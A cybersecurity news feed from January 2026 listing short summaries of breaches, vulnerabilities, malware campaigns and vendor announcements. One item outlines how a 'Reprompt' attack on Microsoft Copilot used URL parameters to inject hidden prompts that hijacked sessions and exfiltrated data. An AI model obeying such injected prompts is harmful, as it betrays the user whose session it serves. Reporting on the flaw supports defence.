ColorTokens has achieved FedRAMP Moderate Authorization for its Xshield microsegmentation platform, a significant milestone that makes the solution readily available to U.S. federal agencies via the FedRAMP Marketplace. This authorization validates Xshield's security posture and enables government bodies to adopt the platform to accelerate their Zero Trust initiatives, particularly in preventing the lateral movement of cyberattacks across complex on-premise, cloud, and OT environments.

Jan 17, 2026 · 3 min read

Asimily Boosts Cisco ISE Integration with Enhanced Microsegmentation for IoT/OT Devices

Asimily, a provider of cyber asset and exposure management, has launched enhanced microsegmentation capabilities, including new support for Security Group Access Control Lists (SGACL) in Cisco Identity Services Engine (ISE). This integration allows organizations to translate rich device context—such as risk, behavior, and classification—from the Asimily platform into dynamically enforced security policies in Cisco ISE. The goal is to automate the containment of threats across complex IT, IoT, and OT environments.

Jan 17, 2026 · 3 min read

SpyCloud Unveils Supply Chain Threat Protection to Combat Third-Party Identity Risks

SpyCloud has launched its Supply Chain Threat Protection solution, a new platform designed to give organizations visibility into identity-related compromises within their vendor and supplier ecosystems. By leveraging a massive repository of recaptured data from breaches and malware infections, the solution provides actionable intelligence on compromised credentials and infected devices affecting third parties. This allows security teams to move beyond static questionnaires and proactively address active threats within their supply chain.

Jan 17, 2026 · 3 min read

Noction IRP v4.3 Launches with Automated DDoS Detection and Routing-Native Mitigation

Noction has released version 4.3 of its Intelligent Routing Platform (IRP), introducing a major new feature called Automatic Anomaly Detection (AAD). This capability uses behavior-based traffic analysis to rapidly identify DDoS attacks and other network anomalies. Once an attack is detected, the platform can automatically trigger mitigation actions using routing-native mechanisms like BGP FlowSpec or Remote Triggered Blackholing (RTBH), enabling network operators to respond to threats in seconds without relying on external systems.

Jan 17, 2026 · 3 min read

JumpCloud Unveils AI-Powered Tools to Govern Shadow AI and Manage Autonomous Agents

JumpCloud has introduced a suite of AI-powered capabilities for its identity and access management (IAM) platform, designed to help organizations manage the security risks of modern AI adoption. The new features focus on discovering and governing 'shadow AI'—the unsanctioned use of AI tools by employees—and applying Zero Trust principles to manage access for non-human autonomous agents. The goal is to provide IT and security teams with the visibility and control needed to turn a potential liability into a secure source of productivity.

Jan 17, 2026 · 3 min read

Acronis Debuts S3-Compatible Archival Storage for MSPs with Predictable Pricing

Acronis has launched Acronis Archival Storage, a new long-term, S3-compatible cold storage solution aimed at Managed Service Providers (MSPs) and their SMB clients. Powered by Seagate's Lyve Cloud, the service is integrated into the Acronis Cyber Protect Cloud platform and features a predictable pricing model with no egress or API fees. This addresses a key need for compliant, cost-effective data retention for large volumes of infrequently accessed data, offering WORM immutability and high durability.

Jan 17, 2026 · 3 min read

Armis Revamps Channel Strategy with Flexible, Tier-Free 'Select Partner Program'

Armis, a leader in cyber exposure management, has launched its new Armis Select Partner Program. The revamped global channel initiative moves away from traditional, rigid tiers in favor of a flexible, three-route model: selling, delivering services, and building solutions. This approach allows partners to engage with Armis in a way that best suits their business model, aiming to accelerate the adoption of the Armis Centrix platform and build a more collaborative partner ecosystem.

Jan 17, 2026 · 2 min read

Darktrace Hires Terry Doyle as First Chief Information Officer to Scale Enterprise IT

AI cybersecurity leader Darktrace has appointed Terry Doyle as its first-ever Chief Information Officer (CIO). Doyle, a veteran technology executive with nearly 30 years of experience, will join the executive committee and be responsible for consolidating the company's enterprise IT and data functions. This strategic hire aims to build enterprise-scale systems and processes to support Darktrace's rapid global growth and enhance its operational discipline.

Jan 17, 2026 · 2 min read

AWS Patches 'CodeBreach' Flaw, Averting Massive GitHub Supply Chain Attack

Amazon Web Services (AWS) has remediated a critical vulnerability in its AWS CodeBuild service, dubbed 'CodeBreach' by Wiz researchers. The flaw, which stemmed from a misconfigured webhook filter, could have allowed unauthenticated attackers to inject malicious code into the build processes of major open-source projects, including the AWS JavaScript SDK. An exploit could have granted attackers administrative control over key GitHub repositories, creating a catastrophic supply chain risk for the millions of applications and cloud environments that depend on these libraries. The vulnerability was discovered following a separate, failed attack attempt, highlighting the real-world threat. AWS has since patched the issue and implemented global hardening measures.

Jan 16, 2026 · 7 min read

Hacker Group 'HawkSec' Claims Breach of 184 Million TotalEnergies Records

A hacking group calling itself 'HawkSec' has claimed a massive data breach against the French energy supermajor, TotalEnergies. In a post on a data leak forum, the group alleged the theft of a database containing nearly 184 million records, including sensitive customer information such as names, email addresses, phone numbers, and bank account details for French customers. To substantiate their claims, HawkSec posted sample data on social media. However, the full extent and legitimacy of the breach remain unverified. TotalEnergies has not yet confirmed the incident. The group's erratic behavior on forums has led some researchers to question their experience, though the potential impact if the claims are true is significant.

Jan 16, 2026 · 6 min read

Critical Flaw in WordPress Plugin 'Modular DS' Actively Exploited for Admin Takeover

A critical, unauthenticated privilege escalation vulnerability in the 'Modular DS' WordPress plugin is being actively exploited in the wild. The flaw, tracked as CVE-2026-23550 with a CVSS score of 10.0, affects over 40,000 websites. It allows attackers to bypass authentication and gain full administrator privileges by sending a specially crafted HTTP request. Security firm Patchstack, which discovered the exploitation, observed attackers creating rogue admin accounts named 'PoC Admin'. The vulnerability lies in the plugin's custom routing and login logic, which can be tricked into logging an unauthenticated user into an existing administrator account. The vendor released a patch in version 2.5.2, and all users are urged to update immediately.

Jan 16, 2026 · 6 min read

Palo Alto Networks Patches High-Severity DoS Flaw in PAN-OS Firewalls

Palo Alto Networks has issued security updates to address a high-severity denial-of-service (DoS) vulnerability, CVE-2026-0227, in its PAN-OS software. The flaw, which has a CVSS score of 7.7, allows an unauthenticated, remote attacker to crash firewalls that have a GlobalProtect gateway or portal enabled. A successful exploit forces the device into maintenance mode, disrupting all network traffic. While Palo Alto Networks is not aware of active exploitation, a proof-of-concept (PoC) exploit reportedly exists. The vulnerability affects multiple versions of PAN-OS, and customers are urged to apply the patches as soon as possible, as there are no workarounds.

Jan 16, 2026 · 5 min read

GlassWorm Malware Pivots to Attack macOS Developers via Malicious VS Code Extensions

The GlassWorm malware campaign has evolved, now specifically targeting macOS developers through malicious extensions for Visual Studio Code and OpenVSX. This new wave of attacks, detailed in a security digest from Acronis, uses a self-propagating worm to deliver its payload. The malware embeds an encrypted payload within JavaScript files, uses a 15-minute execution delay to evade sandboxes, and establishes persistence using LaunchAgents. The primary goal of GlassWorm is to steal a wide range of developer-centric data, including credentials for GitHub and npm, browser data, and information from over 50 different cryptocurrency wallets, highlighting a significant supply chain threat.

Jan 16, 2026 · 6 min read

Central Maine Healthcare Breach Exposes Data of Over 145,000 Patients and Employees

Central Maine Healthcare (CMH) has disclosed a major data breach affecting 145,381 patients and employees. The incident involved an unauthorized third party maintaining access to its network for over two months, from March to June 2025. The compromised data includes highly sensitive personal, medical, and financial information, such as Social Security numbers and treatment details. CMH is offering complimentary credit monitoring services to those affected and has stated it is enhancing its security monitoring to prevent future incidents.

Jan 15, 2026 · 5 min read

Massive Unsecured Database Leaks Personal, Health, and Financial Data of 45 Million French Citizens

Security researchers have discovered a massive, unprotected database on a cloud server containing the sensitive records of approximately 45 million French citizens. The data, which has since been secured, appears to be an aggregation from at least five separate breaches, compiled by a data broker or cybercriminal. The exposed archive included voter registration data, healthcare records, IBANs, and CRM contact information, creating comprehensive and dangerous profiles on a significant portion of the French population.

Jan 15, 2026 · 6 min read

VoidLink: New Modular Linux Malware Framework Discovered Targeting Cloud and Container Environments

Security researchers at Check Point have discovered 'VoidLink,' a highly sophisticated and modular Linux malware framework. Written in the modern Zig programming language, VoidLink is purpose-built for espionage in cloud and containerized environments. It can detect if it's running in AWS, GCP, Azure, Kubernetes, or Docker and adapt its behavior. With a plugin-based architecture inspired by Cobalt Strike, it features advanced rootkit capabilities, an in-memory plugin system, and tools for credential theft from cloud services and Git repositories. Though not yet seen in the wild, its advanced design poses a significant future threat.

Jan 15, 2026 · 7 min read

Microsoft Copilot Flaw Allowed Data Theft via "Reprompt" Session Hijacking Attack

Researchers discovered a significant vulnerability in Microsoft's Copilot AI assistant that allowed for a "Reprompt" attack, enabling threat actors to bypass safety features, hijack user sessions, and exfiltrate data. The flaw, which has been patched in the January 2026 security update, abused URL parameters to inject hidden, follow-up prompts that executed within the victim's authenticated session. This allowed attackers to chain commands and steal information without the user's knowledge, highlighting the security risks of AI assistants processing untrusted input.

Jan 15, 2026 · 5 min read

CISA Mandates Patch for Exploited Windows Zero-Day Used in Attack Chains

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has ordered federal agencies to patch a zero-day vulnerability in the Windows Desktop Window Manager (CVE-2026-20805) by February 3, 2026. The medium-severity information disclosure flaw is being actively exploited in the wild as a crucial component in multi-stage attack chains, allowing attackers to bypass Address Space Layout Randomization (ASLR) and enable more severe exploits like remote code execution. The flaw was addressed in Microsoft's January 2026 Patch Tuesday update.

Jan 14, 2026 · 5 min read

Spanish Energy Giant Endesa Hit by Massive Data Breach, 20M Records Allegedly For Sale

Spain's largest electric utility, Endesa, has confirmed a data breach after detecting unauthorized access to a commercial platform. The company admitted that customer PII, contact details, and bank account IBANs were potentially exposed. The situation is amplified by a threat actor on a cybercrime forum who claims to have stolen a 1.05 TB database containing the data of over 20 million people, which is now up for sale. Endesa, which serves over 10 million customers, is urging vigilance against phishing and fraud.

Jan 14, 2026 · 5 min read

Pax8 Data Leak Exposes Sensitive MSP and Customer Info via Accidental Email

Cloud commerce marketplace Pax8 has confirmed a data exposure incident caused by human error. On January 13, an employee mistakenly sent an email containing a CSV file with sensitive, non-PII business data for approximately 1,800 Managed Service Provider (MSP) partners. The email, sent to fewer than 40 UK-based partners, exposed valuable information such as customer names, Microsoft license counts, pricing, and contract renewal dates, creating a significant risk of targeted phishing and competitive poaching.

Jan 14, 2026 · 5 min read

CISA Warns of Critical Flaws in Rockwell & YoSmart ICS Equipment

CISA has released several Industrial Control Systems (ICS) advisories, warning of significant vulnerabilities in widely deployed equipment from Rockwell Automation and YoSmart. A high-severity SQL injection flaw (CVE-2025-12807) in Rockwell's FactoryTalk platform could allow for database takeover, while another flaw (CVE-2025-9368) can cause a denial-of-service condition. Separately, multiple flaws in YoSmart smart home hubs could permit remote device control and data interception, posing risks to both manufacturing and communications sectors.

Jan 14, 2026 · 4 min read

Russian GRU Hackers (APT28) Evolve Credential-Harvesting Tactics

The Russian GRU-linked threat group BlueDelta, also known as APT28 or Fancy Bear, has been observed refining its credential-harvesting operations. According to research from Recorded Future, campaigns between February and September 2025 targeted energy, defense, and policy organizations in Europe and Eurasia. The group uses tailored spear-phishing emails, multi-stage redirection, and abuses low-cost, disposable infrastructure like ngrok and other free hosting services to enhance stealth and complicate attribution.

Jan 14, 2026 · 4 min read

Russian Hackers Target Ukrainian Military with "PluggyApe" Malware

A Russian-linked hacking group, Void Blizzard (also known as UAC-0190), has been targeting the Ukrainian Defense Forces with a new cyber-espionage campaign. According to CERT-UA, the attacks, which occurred between October and December 2025, use a novel malware strain called PluggyApe. The campaign employs sophisticated social engineering, with attackers making direct contact with targets on secure messaging apps like Signal and WhatsApp, using charity-themed lures to build trust and deliver the malware.

Jan 14, 2026 · 4 min read

ConnectPOS Exposed Admin GitHub Token for Over Four Years, Creating Massive Supply Chain Risk

Point-of-sale vendor ConnectPOS exposed a GitHub Personal Access Token (PAT) with full administrative privileges in its public documentation for over four years, from September 2021 until its discovery in January 2026. The blunder, found by security firm Sansec, put the vendor's entire software supply chain at risk. An attacker could have used the token to inject malicious code, such as a payment card skimmer, into the POS software, which would then be distributed to its 12,000+ customers, including major brands like Asus and Indiana University.

Jan 14, 2026 · 4 min read

Microsoft's January 2026 Patch Tuesday Fixes 114 Flaws, Including One Exploited Zero-Day

Microsoft has released its first Patch Tuesday of 2026, a substantial update that addresses 114 security vulnerabilities across a wide range of its products, including Windows, Office, Azure, and SharePoint. The release includes fixes for eight critical remote code execution (RCE) vulnerabilities and, most notably, one moderate-severity information disclosure zero-day (CVE-2026-20805) that is confirmed to be actively exploited in the wild. This is the third-largest January update on record, and administrators are urged to prioritize deployment.

Jan 14, 2026 · 3 min read

Ransomware Evolves: Groups Recruit Insiders, Add DDoS as Profits Fall

The ransomware landscape is undergoing a significant evolution heading into 2026. Despite a 47% surge in publicly reported attacks in 2025, analysis from Recorded Future shows that overall profits for threat actors have declined. This financial pressure is forcing a tactical shift. Key trends to watch for include the bundling of DDoS services with ransomware to increase victim coercion, a more aggressive focus on recruiting corporate insiders to gain initial access, and a notable globalization of new ransomware groups emerging outside of the traditional Russian sphere of influence.

Jan 13, 2026 · 6 min read

Urgent Patch: CISA Adds Actively Exploited Gogs RCE Flaw to KEV Catalog

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a critical path traversal vulnerability, CVE-2025-8110, in the Gogs self-hosted Git service to its Known Exploited Vulnerabilities (KEV) catalog. This flaw, which allows for remote code execution (RCE) via symlink manipulation, is confirmed to be actively exploited in the wild. With a CVSS score of 8.7, it bypasses a previous patch for CVE-2024-55947. Federal agencies are mandated to remediate by February 2, 2026. The vulnerability affects an estimated 1,600 internet-exposed Gogs servers, posing a significant risk to organizations using the platform for source code management.

Jan 13, 2026 · 6 min read

Poetic Justice: BreachForums Hacked, Database of 324,000 Cybercriminals Leaked

In a significant turn of events for the cybercrime community, the user database for the notorious hacking marketplace BreachForums was leaked online on January 9, 2026. The dump contains sensitive records for 323,986 users, including usernames, email addresses, IP addresses, private messages, and Argon2-hashed passwords. The breach, allegedly occurring in August 2025 and claimed by an individual named "James," represents a major operational security failure and provides a trove of intelligence for law enforcement agencies seeking to identify and prosecute threat actors like 'IntelBroker' and 'ShinyHunters' who were active on the forum.

Jan 13, 2026 · 6 min read

Oregon DEQ Kept Data Breach of 4,800 People Secret for Nine Months

The Oregon Department of Environmental Quality (DEQ) confirmed on January 13, 2026, that a cyberattack in April 2025 exposed the personal data of approximately 4,800 people. The agency opted not to issue a broad public disclosure, citing that Oregon law did not require it, and instead began sending notification letters to affected individuals in late December 2025, over eight months after the incident. The initial attack, which the Rhysida ransomware gang later claimed, caused significant operational disruption. The delay in notification has drawn criticism and raises questions about the agency's transparency and incident response process.

Jan 13, 2026 · 4 min read

French Immigration Agency Data Leaked via Third-Party Breach

France's Office for Immigration and Integration (OFII) has confirmed a data breach originating from a compromised third-party service provider. In early January 2026, a hacker claimed to be selling a database of up to 2.1 million records of foreign residents on BreachForums, posting samples that included names, contact details, and nationalities. OFII clarified that its own systems were not breached, but that the attack targeted a private training provider responsible for mandatory integration courses. The incident highlights the significant risks of supply chain attacks for government agencies and could lead to GDPR penalties for OFII as the data controller.

Jan 13, 2026 · 4 min read

G7 Urges Financial Sector to Prepare for Quantum Computing Threat

The G7 Cyber Expert Group (CEG), co-chaired by the U.S. Department of the Treasury and the Bank of England, has issued a public statement and roadmap advising the global financial sector to begin a coordinated transition to quantum-resilient technology. The guidance warns that advanced quantum computers will eventually be able to break the public-key cryptography that secures the world's financial transactions. The roadmap encourages financial institutions to start assessing their quantum risks and developing formal plans for migrating to post-quantum cryptography (PQC) standards, such as those being developed by NIST, to counter 'harvest now, decrypt later' attacks.

Jan 12, 2026 · 5 min read

Supply Chain Attack: Malicious npm Packages Steal Credentials from n8n Automation Platform

A novel supply chain attack discovered by Endor Labs is targeting users of the n8n workflow automation platform. Attackers are publishing malicious packages to the npm registry, disguised as legitimate 'community nodes' for popular services. When an unsuspecting user installs one of these nodes and enters their credentials (e.g., OAuth tokens, API keys), the malicious code exfiltrates the entire credential store from the n8n instance to an attacker-controlled server. This gives the attackers access to all services connected to the victim's n8n workflows, such as Salesforce and Stripe, creating a significant risk of widespread data breaches and financial fraud.

Jan 12, 2026 · 5 min read

Cyber-Fraud Now Top Global Threat, Surpassing Ransomware, WEF Report Finds

The World Economic Forum's (WEF) 'Global Cybersecurity Outlook 2026' report, produced with Accenture, reveals a major shift in the threat landscape: cyber-enabled fraud and phishing have now surpassed ransomware as the top concern for global business leaders. The report highlights that fraud has reached 'record highs,' with 77% of leaders reporting an increase. It also identifies Artificial Intelligence as the most consequential force shaping cybersecurity in 2026, with 94% of leaders agreeing it will be the biggest factor. AI is seen as a double-edged sword, accelerating both offensive capabilities and defensive solutions, while growing concerns about data leaks from generative AI persist.

Jan 12, 2026 · 5 min read

GoBruteforcer Botnet Exploits Weak Credentials on Linux Servers to Target Crypto Wallets

A modular Go-based botnet named GoBruteforcer is actively compromising internet-facing Linux servers by brute-forcing weak credentials for services like FTP, MySQL, and PostgreSQL. According to Check Point Research, the campaign's success is fueled by the widespread use of default or weak passwords, often found in AI-generated server deployment examples. Once compromised, servers are added to an IRC-controlled botnet and used to scan for more victims. The attackers have a clear financial motive, as they have been observed deploying tools on compromised hosts to scan for and drain TRON and Binance Smart Chain cryptocurrency wallets.

Jan 12, 2026 · 5 min read

High-Severity Code Injection Flaw in Open WebUI (CVE-2025-64496) Allows RCE

A high-severity vulnerability, tracked as CVE-2025-64496, has been discovered in Open WebUI, a popular self-hosted interface for large language models (LLMs). The flaw, found by Cato Networks, allows a malicious AI server to inject arbitrary JavaScript code into a user's browser session. This can be exploited to steal authentication tokens and take over the user's account. If the compromised user has specific permissions enabled, the vulnerability can be escalated to achieve full remote code execution (RCE) on the host server. The issue affects Open WebUI versions 0.6.34 and older and was patched in version 0.6.35.

Jan 12, 2026 · 5 min read

Iran's MuddyWater APT Unveils 'RustyWater' RAT in Middle East Espionage

The Iranian state-sponsored advanced persistent threat (APT) group MuddyWater, also known as Mango Sandstorm and TA450, has been observed deploying a new, custom-built Remote Access Trojan (RAT) named 'RustyWater'. According to research from CloudSEK, this new implant, written in the Rust programming language, is being used in a spear-phishing campaign targeting diplomatic, maritime, financial, and telecom entities across the Middle East. The shift to a Rust-based tool marks a significant evolution in the group's capabilities, aimed at enhancing stealth and evading detection during long-term espionage operations.

Jan 11, 2026 · 6 min read

Qilin Ransomware Hits French Infra Giant Bouygues, Claims 80GB Data Theft

The prolific Qilin ransomware group has listed French multinational infrastructure firm Bouygues Energies & Services as its latest victim on its dark web leak site. The group claims to have exfiltrated 80 GB of highly sensitive data, comprising 31,000 files. Most alarmingly, the threat actors allege the stolen data includes documents related to industrial control systems (ICS), such as SCADA interfaces and network plans for critical infrastructure projects like tunnels and tramways. This attack highlights the severe risk ransomware poses to physical safety and national security, extending beyond simple data encryption.

Jan 11, 2026 · 6 min read

Apex Legends 'Remote Control' Hack Patched After Streamers Hijacked

Respawn Entertainment, the developer of the popular battle royale game Apex Legends, rapidly deployed a patch on January 10, 2026, to fix a significant security exploit. The vulnerability allowed a malicious actor to remotely take control of other players' characters during a live match, an incident that affected several high-profile streamers. The developer was quick to reassure the community that the exploit was not a Remote Code Execution (RCE) vulnerability, meaning attackers could not execute malicious code on victims' computers. The issue was resolved within a day of being publicly acknowledged.

Jan 11, 2026 · 4 min read

Everest Ransomware Claims 900 GB Data Theft from Nissan

The Everest ransomware group has claimed a massive data breach against Japanese automotive giant Nissan Motor Co., Ltd. In a post on its dark web leak site on January 10, 2026, the group alleged it had stolen approximately 900 GB of sensitive corporate data. To back up its claim, Everest published screenshots showing internal directory structures and file names related to dealerships, finance, and audits. The group, which employs a double-extortion model, has given Nissan a five-day deadline to respond before it threatens to release the data publicly. Nissan has not yet officially confirmed the breach.

Jan 11, 2026 · 6 min read

High-Severity Flaw in Mailpit Dev Tool Allows Email Interception

A high-severity vulnerability, tracked as CVE-2026-22689, has been discovered in Mailpit, a popular email testing tool for developers. The flaw is a Cross-Site WebSocket Hijacking (CSWSH) issue affecting all versions prior to 1.28.2. It allows a remote attacker to intercept sensitive data, including the full content of test emails, by tricking a developer running a vulnerable Mailpit instance into visiting a specially crafted malicious website. Users are strongly urged to upgrade to the patched version to mitigate the risk of data exposure.

Jan 11, 2026 · 5 min read

French Bank Customers Hit by 'Quishing' Scam Using Fake Physical Cards

A highly deceptive phishing campaign, dubbed 'quishing,' is targeting bank customers in France using a blend of physical and digital tactics. Scammers are sending official-looking letters by postal mail that contain a high-quality counterfeit bank card. The letter instructs the recipient to 'activate' the new card by scanning an included QR code. This QR code directs the victim to a fraudulent website designed to mimic their bank's portal, where their banking credentials and personal information are harvested. This hybrid attack method is effective at bypassing traditional email security filters.

Jan 11, 2026 · 4 min read

Texas Health System Breach Exposes Data of Over 34,000 Patients

Vida Y Salud Health Systems Inc., a nonprofit health center serving rural communities in South Texas, has reported a data breach that exposed the sensitive personal and medical information of 34,504 patients. The organization detected unauthorized access to its network in October 2025, where an attacker copied files containing names, Social Security numbers, driver's license numbers, and protected health information (PHI). Vida Y Salud is notifying affected individuals and offering complimentary credit monitoring services as law firms begin to investigate the incident.

Jan 11, 2026 · 5 min read

Financial Sector Warned of Systemic Supply Chain Risk and 'Indirect Ransomware'

A new threat intelligence report for 2025-2026 reveals a perilous cyber landscape for the financial sector, dominated by systemic supply chain risks and evolving ransomware tactics. Citing data that 97% of U.S. banks were breached via third-party suppliers in 2024, the report underscores the critical vulnerability posed by partners. It also highlights the rise of 'indirect ransomware,' where attackers compromise a supplier to bypass a bank's defenses. Geopolitical threats also persist, with pro-Russian hacktivists targeting European banks and the North Korean Lazarus Group remaining a primary state-aligned threat.

Jan 11, 2026 · 5 min read

YARA-X Update Helps Analysts Avoid Flawed Detection Rules

Version 1.11.0 of YARA-X, a popular tool for malware analysis, has been released with a key enhancement aimed at improving the accuracy of detection rules. The update introduces 'hash function warnings,' a feature that alerts security analysts when they make common errors in hash string comparisons, such as providing a SHA1 hash where a SHA256 hash is expected. This quality-of-life improvement helps prevent silent false negatives, where a flawed rule fails to detect malware without providing any error, thereby strengthening threat hunting and security operations.

Jan 11, 2026 · 3 min read

Chinese State Hackers 'Salt Typhoon' Breach U.S. Congressional Committee Emails

The Chinese state-sponsored hacking group known as Salt Typhoon has reportedly compromised the email systems of staff members for several key U.S. House of Representatives committees. The cyberespionage campaign, detected in December 2025, targeted aides on influential panels including those overseeing China, foreign affairs, intelligence, and armed services. While lawmakers' personal accounts are not believed to have been accessed, the infiltration of staff networks raises significant national security concerns about the potential for long-term intelligence gathering from sensitive, unclassified communications. Salt Typhoon is a known actor with a history of targeting U.S. critical infrastructure.

Jan 10, 2026 · 6 min read

Cisco Patches Medium-Severity Flaws in Snort 3 Engine That Could Lead to DoS and Data Leaks

Cisco has disclosed two medium-severity vulnerabilities, CVE-2026-20026 and CVE-2026-20027, in its widely used Snort 3 detection engine. The flaws exist in the processing of DCE/RPC traffic and can be triggered by a remote, unauthenticated attacker. CVE-2026-20026 (CVSS 5.8) is a use-after-free issue that could cause the engine to crash, leading to a denial-of-service. CVE-2026-20027 (CVSS 5.3) is an out-of-bounds read that could leak sensitive memory data. The vulnerabilities affect numerous Cisco products, including Secure Firewall, IOS XE with UTD, and Meraki MX appliances. Patches are available for some products, but others are pending.

Jan 10, 2026 · 5 min read

Google Patches High-Severity Chrome Flaw That Could Allow Attackers to Bypass Security Policies

Google has issued a security update for its Chrome browser, patching a high-severity vulnerability tracked as CVE-2026-0628. The flaw, which affects Chrome on Windows, macOS, and Linux, is described as an "insufficient policy enforcement" issue within the WebView component. An attacker could exploit this by tricking a user into installing a malicious extension, which could then bypass security controls to execute unauthorized code on normally protected browser pages. This could lead to data theft or session hijacking. While there is no evidence of active exploitation, Google urges all users to update to the patched versions immediately.

Jan 10, 2026 · 5 min read

Online Betting Giant BetVictor Discloses Major Data Breach, Customer Data Compromised

BetVictor, a major European online gambling company, has officially disclosed a significant data breach that compromised sensitive customer information. The security incident was first detected on January 8, 2026, during routine security audits and has caused unspecified operational disruptions. The company has not yet detailed the nature of the attack or the exact types of data accessed. An investigation is underway as BetVictor works to secure its systems and manage the fallout, which could include regulatory scrutiny and a loss of customer trust in the highly competitive online gaming market.

Jan 10, 2026 · 5 min read

Data of 17.5 Million Instagram Users Leaked on Hacker Forum After Scraping Attack

The personal data of approximately 17.5 million Instagram users has been leaked on the BreachForums hacking forum. The data, posted by a user named 'Solonik,' was allegedly obtained via automated data scraping from public APIs. The leaked information includes full names, email addresses, phone numbers, and user IDs, exposing the affected individuals to a high risk of targeted phishing, identity theft, and SIM swapping attacks. Following the leak, users have reported a surge in fraudulent password reset attempts. As of January 10, 2026, Instagram's parent company, Meta, has not formally acknowledged the incident.

Jan 10, 2026 · 6 min read

Critical OpenSSH Flaw Exposes Moxa Industrial Switches to Remote Code Execution

Industrial networking vendor Moxa has issued a security advisory for a critical vulnerability, CVE-2023-38408, affecting its EDS-G4000 and RKS-G4000 series industrial Ethernet switches. The flaw resides in the OpenSSH service integrated into the device firmware and could allow a remote attacker to execute arbitrary code. These switches are commonly used in critical infrastructure and industrial control systems (ICS), making the vulnerability particularly high-risk. The Canadian Centre for Cyber Security has echoed the warning, and both organizations are urging administrators to apply the provided firmware updates immediately to mitigate the threat.

Jan 10, 2026 · 5 min read

HPE OneView Flaw Scores Perfect 10.0, Grants Attackers 'Keys to the Kingdom'

Hewlett Packard Enterprise (HPE) has disclosed CVE-2025-37164, a critical unauthenticated remote code execution vulnerability in its OneView infrastructure management software. The flaw, rated with a maximum CVSS score of 10.0, allows a remote attacker to gain complete control of the centralized management appliance without any credentials. Given OneView's extensive privileges over servers, storage, and firmware, a successful exploit could lead to a catastrophic compromise of an organization's entire infrastructure. CISA has added the vulnerability to its KEV catalog, mandating immediate patching for federal agencies.

Jan 9, 2026 · 5 min read

FBI: North Korea's Kimsuky APT Using 'Quishing' to Bypass MFA

The U.S. Federal Bureau of Investigation (FBI) has issued a formal advisory warning that the North Korean state-sponsored threat group Kimsuky (also known as APT43) is actively using malicious QR codes in spear-phishing emails. This tactic, dubbed 'quishing,' is designed to bypass traditional email security by tricking users into scanning the code with a personal mobile device. The goal is to harvest credentials and session tokens from high-value targets in government, academic institutions, and think tanks, effectively bypassing multi-factor authentication (MFA) through session hijacking.

Jan 9, 2026 · 6 min read

London Councils Hit by Major Cyberattack, Resident Data Exposed

A significant cyberattack targeting a shared IT system used by multiple London councils has resulted in a data breach exposing the sensitive personal information of thousands of residents. The incident, which affected Kensington and Chelsea Council among others, has caused widespread service disruptions and has triggered an investigation by the UK's National Cyber Security Centre (NCSC) and the Metropolitan Police. The attack highlights the systemic risks associated with interconnected IT platforms in the public sector, where a single point of failure can have cascading consequences.

Jan 9, 2026 · 5 min read

Critical 9.8 CVSS RCE Flaw Hits Trend Micro Apex Central

Trend Micro has released patches for multiple vulnerabilities in its on-premise Apex Central security management console, including a critical remote code execution (RCE) flaw, CVE-2025-69258, with a CVSS score of 9.8. The vulnerability allows an unauthenticated remote attacker to load a malicious DLL and execute code with SYSTEM-level privileges. The flaw resides in the 'MsgReceiver.exe' component listening on TCP port 20001. Two other high-severity denial-of-service flaws were also fixed. Customers are urged to update to Build 7190 or later.

Jan 9, 2026 · 5 min read

Qilin Ransomware Gang Claims Attack on Italian Manufacturer Cressi

The prolific Russia-linked Qilin ransomware gang has claimed responsibility for a cyberattack on Cressi, a major Italian manufacturer of diving and water sports equipment. The claim was posted on the group's darknet leak site. As of January 9, 2026, the gang has not leaked any stolen data or set a public ransom deadline, a common extortion tactic used to pressure victims. Cressi has not yet commented on the allegation. The Qilin group is one of the most active ransomware operations, known for targeting the manufacturing and healthcare sectors and for its high-profile attacks in 2025.

Jan 9, 2026 · 4 min read

CISA Issues Six New Advisories for Hitachi and Mitsubishi ICS Flaws

On January 8, 2026, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released six new Industrial Control Systems (ICS) advisories. The alerts detail vulnerabilities discovered in products from Hitachi Energy and Mitsubishi Electric. These products, including the Hitachi Energy Asset Suite and Mitsubishi Electric's ICONICS Digital Solutions, are widely deployed across multiple critical infrastructure sectors, with a specific mention of the Energy sector. CISA is urging organizations using this equipment to review the advisories and remediate the flaws to prevent potential disruption of industrial processes.

Jan 9, 2026 · 4 min read

Cisco Patches Zero-Day Information Disclosure Flaw in ISE Platform

Cisco has patched a high-severity zero-day vulnerability, CVE-2026-20029, in its Identity Services Engine (ISE) and ISE Passive Identity Connector (ISE-PIC). The flaw could allow an authenticated, remote administrator to read arbitrary files from the underlying system. The vulnerability is due to improper parsing of XML in the web-based management interface. An attacker could exploit it by uploading a malicious file. Cisco has released software updates to address the issue and urges customers to apply them promptly to prevent sensitive data exposure.

Jan 9, 2026 · 4 min read

Cyberattacks on Automotive and Logistics Supply Chains Skyrocket

A new report from Everstream Analytics reveals a dramatic escalation in cyberattacks targeting global supply chains. In 2025, the automotive manufacturing industry experienced a staggering 722% increase in cyber incidents compared to the previous year. The logistics industry was also heavily impacted, with attacks growing by 61%. The report identifies this surge in cyber warfare as a primary factor set to disrupt trade and logistics in 2026, alongside hybrid warfare, aging infrastructure, and the weaponization of trade regulations. This transforms supply chain risk from a cost issue to a major security challenge.

Jan 9, 2026 · 4 min read

NZ Patient Portal Breach Exposes Health Records of 126,000

ManageMyHealth, New Zealand's largest online patient portal, has confirmed a significant data breach discovered on December 30, 2025. The cyberattack compromised the 'My Health Documents' module, exposing the sensitive medical records of between 108,000 and 126,000 users. A threat actor using the alias 'Kazu' has claimed responsibility, alleging the exfiltration of 108 gigabytes of data and issuing a ransom demand. Compromised information includes clinical notes, lab results, and hospital discharge summaries. ManageMyHealth has engaged cybersecurity specialists, notified authorities including the Office of the Privacy Commissioner, and obtained a High Court injunction to prevent the stolen data's distribution.

Jan 8, 2026 · 5 min read

State-Sponsored "BRICKSTORM" Backdoor Targets VMware and Windows in Critical Infrastructure

CISA, the NSA, and the Canadian Centre for Cyber Security have released an updated report on BRICKSTORM, a sophisticated backdoor malware. The report links the malware to Chinese state-sponsored threat actors who are using it to compromise VMware vSphere and Windows environments, primarily within public sector and critical infrastructure organizations. BRICKSTORM is designed for long-term persistence, credential theft, and data exfiltration, posing a significant espionage threat to enterprise virtualization platforms.

Jan 8, 2026 · 6 min read

Zero-Day in End-of-Life D-Link Routers Actively Exploited; No Patch Will Be Released

